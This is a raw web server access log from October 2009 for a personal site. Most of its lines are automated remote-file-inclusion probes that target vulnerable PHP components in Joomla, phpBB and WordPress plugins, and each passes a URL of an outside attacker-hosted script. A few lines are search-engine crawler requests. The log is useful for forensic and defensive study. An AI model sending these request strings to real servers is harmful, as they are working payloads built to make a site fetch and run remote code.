81.12.13.152 - - [30/Oct/2009:09:31:04 -0700] "GET /logs/access_080823.log//newspublish/include.php?path%5Bdocroot%5D=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:31:42 -0700] "GET /logs/access_090515.log//administrator/components/com_uhp/uhp_config.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
63.163.109.234 - - [30/Oct/2009:09:31:42 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosconfig_absolute_path=http://www.mcclearyspub.com/images/los/id1.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.238.2.226 - - [30/Oct/2009:09:31:51 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:09:31:56 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:09:31:56 -0700] "GET /skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:09:31:57 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:31:58 -0700] "GET /logs/access_080209.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:32:01 -0700] "GET /logs/access_080619.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:32:06 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:09:32:06 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:32:09 -0700] "GET /logs/access_081123.log/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:32:18 -0700] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:32:21 -0700] "GET /logs/access_081123.log/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.123.88 - - [30/Oct/2009:09:32:23 -0700] "GET /logs/access_081123.log/joomla/index.php?option=com_restaurante&task=http://meidu.soit.com.cn//txt/temp_upload/dat/wondho/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:23 -0700] "GET /logs/access_080501.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:23 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:23 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:24 -0700] "GET /logs/access_080619.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:25 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:26 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:26 -0700] "GET /logs/access_080501.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:32:26 -0700] "GET /logs/access_080619.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:32:38 -0700] "GET /logs/access_090308.log/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:33:24 -0700] "GET /logs/access_090308.log/index.php?main=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:09:33:42 -0700] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.7.173.20 - - [30/Oct/2009:09:33:45 -0700] "GET /logs/access_080129.log%20%20//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:33:46 -0700] "GET /skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:33:46 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:33:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.167.62.165 - - [30/Oct/2009:09:33:51 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
83.167.62.165 - - [30/Oct/2009:09:33:52 -0700] "GET /logs/?N=D HTTP/1.1" 200 123783 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
83.167.62.165 - - [30/Oct/2009:09:33:54 -0700] "GET /megumi/?S=D HTTP/1.1" 200 1611 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
83.167.62.165 - - [30/Oct/2009:09:33:56 -0700] "GET /tmp/phpS8x7dr HTTP/1.1" 403 163 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.dmulk.com"
208.181.243.6 - - [30/Oct/2009:09:34:20 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:34:53 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:34:57 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:35:06 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:35:16 -0700] "GET /logs/access_080703.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:35:16 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:35:16 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:35:34 -0700] "GET /logs/access_080518.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:09:35:56 -0700] "GET /logs/access_090704.log%20%20//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
139.142.180.81 - - [30/Oct/2009:09:36:00 -0700] "GET /logs/access_080129.log%20%20//skin/zero_vote/error.php?dir=http://www.shoppingxxxsource.com/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:13 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:13 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:13 -0700] "GET /logs/access_090506.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:14 -0700] "GET /logs/access_090514.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:36:22 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:36:23 -0700] "GET /logs/access_080530.log//Neos_Chronos/header.php?base_folder=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:38 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:38 -0700] "GET /logs/access_090506.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:38 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.11 - - [30/Oct/2009:09:36:51 -0700] "GET /logs/access_090514.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:36:56 -0700] "GET /logs/access_080703.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:36:56 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:36:56 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
112.78.14.2 - - [30/Oct/2009:09:36:56 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://119.69.199.43/bbs//idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:09:37:13 -0700] "GET /logs/access_080529.log%20%20//link_main.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.193.15.3 - - [30/Oct/2009:09:37:37 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16076 "-" "Mozilla/5.0" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:37:58 -0700] "GET /logs/access_080502.log//?_zb_path=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:37:58 -0700] "GET /logs/access_080226.log//?_zb_path=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:37:59 -0700] "GET /logs//?_zb_path=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 200 123788 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [30/Oct/2009:09:37:59 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.5; http://dmulk.com/blog" "dmulk.com"
164.125.234.121 - - [30/Oct/2009:09:37:59 -0700] "GET /?_zb_path=http://ea3.fileave.com/fx29id1.txt??? HTTP/1.1" 200 16039 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:39:02 -0700] "GET /bikes/dteel/2008_02_23/?M=A HTTP/1.0" 200 1540 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:23 -0700] "GET /logs//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:24 -0700] "GET /bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:24 -0700] "GET /logs/access_090517.log//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:24 -0700] "GET /logs/access_080315.log//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:26 -0700] "GET /bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:26 -0700] "GET /logs//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:26 -0700] "GET /logs/access_090517.log//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:39:26 -0700] "GET /logs/access_080315.log//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [30/Oct/2009:09:39:33 -0700] "GET /logs/access_080515.log%20%20//link_main.php?phpbb_root_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:08 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:08 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:12 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:12 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:12 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:12 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:13 -0700] "GET /logs/access_071016.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
58.230.118.81 - - [30/Oct/2009:09:40:14 -0700] "GET /logs/access_071028.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://poohh.fileave.com/aa.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:40:45 -0700] "GET /logs/access_080416.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.225.23.4 - - [30/Oct/2009:09:40:45 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.melawai.com//images/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:40:56 -0700] "GET /logs/access_070801.log HTTP/1.0" 200 22773 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.211.23 - - [30/Oct/2009:09:41:08 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.23 - - [30/Oct/2009:09:41:09 -0700] "GET /sitemap.xml HTTP/1.1" 200 189 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:41:11 -0700] "GET /logs/access_071122.log/////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:41:12 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 123791 "-" "Mozilla/5.0" "www.dmulk.com"
81.12.13.152 - - [30/Oct/2009:09:41:12 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 16075 "-" "Mozilla/5.0" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:41:33 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.115.254 - - [30/Oct/2009:09:41:43 -0700] "GET /logs/access_081112.log HTTP/1.0" 200 4043902 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.13.191.76 - - [30/Oct/2009:09:41:44 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://0pop.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:21 -0700] "GET /logs/access_090517.log%20%20//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:21 -0700] "GET /logs/access_080315.log%20%20//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:25 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:26 -0700] "GET /logs/access_090517.log%20%20//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.236.23.242 - - [30/Oct/2009:09:42:27 -0700] "GET /logs/access_080315.log%20%20//bereziak/harrika//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /logs/access_090515.log/SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.54.26 - - [30/Oct/2009:09:42:29 -0700] "GET /SQuery/lib/gore.php?libpath=http://www.kq-china.com/web/components/com_virtuemart/themes/default/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
